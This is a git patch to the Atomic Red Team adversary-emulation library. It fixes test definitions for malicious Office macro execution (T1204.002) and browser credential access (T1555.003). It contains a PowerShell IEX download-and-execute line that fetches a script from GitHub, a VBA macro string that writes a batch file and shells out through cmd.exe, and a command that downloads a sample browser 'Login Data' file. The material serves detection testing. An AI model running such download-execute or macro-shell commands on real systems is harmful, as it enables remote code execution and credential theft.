From 2dcdc27df73cc343d308e7c0afa37f2d77aa02e1 Mon Sep 17 00:00:00 2001
From: Atomic Red Team doc generator <opensource@redcanary.com>
Date: Thu, 14 Dec 2023 04:47:22 +0000
Subject: [PATCH] Generated docs from job=generate-docs branch=master [ci skip]

---
 atomics/Indexes/index.yaml         | 7 +++++--
 atomics/Indexes/windows-index.yaml | 7 +++++--
 atomics/T1204.002/T1204.002.md     | 6 +++---
 atomics/T1555.003/T1555.003.md     | 2 +-
 4 files changed, 14 insertions(+), 8 deletions(-)

diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 7d85a03a..cecdcac4 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -48355,8 +48355,11 @@ execution:
         command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
-          $macrocode = "   Open `"#{bat_path}`" For Output As #1`n   Write #1, `"calc.exe`"`n   Close #1`n   a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n"
+          $macrocode = "   Open `"#{bat_path}`" For Output As #1`n   Write #1, `"calc.exe`"`n   Close #1`n   a = Shell(`"cmd.exe /c #{bat_path} `", vbNormalFocus)`n"
           Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product}
+        cleanup_command: |
+          Remove-Item #{bat_path} -ErrorAction Ignore
+          Get-Process | Where-Object { $_.MainModule.FileName -like "*calculator*" } | Stop-Process
         name: powershell
     - name: Excel 4 Macro
       auto_generated_guid: 4ea1fc97-8a46-4b4e-ba48-af43d2a98052
@@ -84958,7 +84961,7 @@ credential-access:
           '
         prereq_command: if (Test-Path "PathToAtomicsFolder\T1555.003\src\Login Data")
           {exit 0} else {exit 1}
-        get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T155.003/src/LoginData?raw=true"
+        get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/src/Login%20Data?raw=true"
           -Outfile: "PathToAtomicsFolder\T1555.003\src\Login Data"'
       executor:
         command: |
diff --git a/atomics/Indexes/windows-index.yaml b/atomics/Indexes/windows-index.yaml
index 496fb5e4..1c51699c 100644
--- a/atomics/Indexes/windows-index.yaml
+++ b/atomics/Indexes/windows-index.yaml
@@ -39899,8 +39899,11 @@ execution:
         command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
-          $macrocode = "   Open `"#{bat_path}`" For Output As #1`n   Write #1, `"calc.exe`"`n   Close #1`n   a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n"
+          $macrocode = "   Open `"#{bat_path}`" For Output As #1`n   Write #1, `"calc.exe`"`n   Close #1`n   a = Shell(`"cmd.exe /c #{bat_path} `", vbNormalFocus)`n"
           Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product}
+        cleanup_command: |
+          Remove-Item #{bat_path} -ErrorAction Ignore
+          Get-Process | Where-Object { $_.MainModule.FileName -like "*calculator*" } | Stop-Process
         name: powershell
     - name: Excel 4 Macro
       auto_generated_guid: 4ea1fc97-8a46-4b4e-ba48-af43d2a98052
@@ -69460,7 +69463,7 @@ credential-access:
           '
         prereq_command: if (Test-Path "PathToAtomicsFolder\T1555.003\src\Login Data")
           {exit 0} else {exit 1}
-        get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T155.003/src/LoginData?raw=true"
+        get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/src/Login%20Data?raw=true"
           -Outfile: "PathToAtomicsFolder\T1555.003\src\Login Data"'
       executor:
         command: |
diff --git a/atomics/T1204.002/T1204.002.md b/atomics/T1204.002/T1204.002.md
index da92f724..cc1e759e 100644
--- a/atomics/T1204.002/T1204.002.md
+++ b/atomics/T1204.002/T1204.002.md
@@ -273,13 +273,13 @@ Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product}
 ```
 
 #### Cleanup Commands:
-
-
 ```powershell
-Remove-Item "#{bat_path}" -ErrorAction Ignore
+Remove-Item #{bat_path} -ErrorAction Ignore
 Get-Process | Where-Object { $_.MainModule.FileName -like "*calculator*" } | Stop-Process
 ```
 
+
+
 #### Dependencies:  Run with `powershell`!
 ##### Description: Microsoft #{ms_product} must be installed
 ##### Check Prereq Commands:
diff --git a/atomics/T1555.003/T1555.003.md b/atomics/T1555.003/T1555.003.md
index 677252f7..aad2b306 100644
--- a/atomics/T1555.003/T1555.003.md
+++ b/atomics/T1555.003/T1555.003.md
@@ -893,7 +893,7 @@ if (Test-Path "PathToAtomicsFolder\T1555.003\src\Login Data") {exit 0} else {exi
 ```
 ##### Get Prereq Commands:
 ```powershell
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T155.003/src/LoginData?raw=true" -Outfile: "PathToAtomicsFolder\T1555.003\src\Login Data"
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/src/Login%20Data?raw=true" -Outfile: "PathToAtomicsFolder\T1555.003\src\Login Data"
 ```